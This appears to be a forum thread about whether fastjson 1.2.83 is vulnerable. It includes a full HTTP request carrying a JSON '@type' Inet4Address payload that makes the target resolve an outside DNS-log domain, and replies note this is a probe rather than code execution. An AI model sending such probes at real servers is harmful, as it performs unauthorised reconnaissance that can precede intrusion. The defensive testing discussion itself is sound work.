项目代码路径(Project Code Path): https://github.com/wuyaozong-qd/fastjsonTest
1.2.83版本情况下,使用burp或者yakit测试结果发现漏洞(In the case of version 1.2.83, vulnerabilities were found using burp or yakit testing results):
相同代码升级到2.0.39未发现漏洞(Upgrade the same code to 2.0.39 without discovering any vulnerabilities);
5条答案
按热度按时间7gs2gvoe1#
yakit web Fuzzer相关测试数据包(Yakit web Fuzzer related testing data package):
`POST /server/test/handle HTTP/1.1
Host: 10.11.7.76:8003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 116
{"data":{"@type":"java.net.Inet4Address","val":"ayzjtuzdmp.dnstunnel.run"}}`
ygya80vv2#
你这个java.net.Inet4Address,本来就在IdentityHashMap,我觉得你说的但不是漏洞利用点,利用其他触发类漏洞需要进行开启autotype,除非找到了 其他的绕过黑名单类
ymdaylpp3#
没看懂;有几个疑问?
1.2.83版本:
1、java.net.Inet4Address 会有地址回显问题,但不会是漏洞利用点,无法触发漏洞?不会存在安全漏洞?
dohp0rv54#
应该是,能够做域名解析,但是想要远程加载类命令执行需要开autotype,或者找到其他链子,目前高版本的链子只到1.2.80没记错的话。
o3imoua45#
能解析个域名就漏洞了?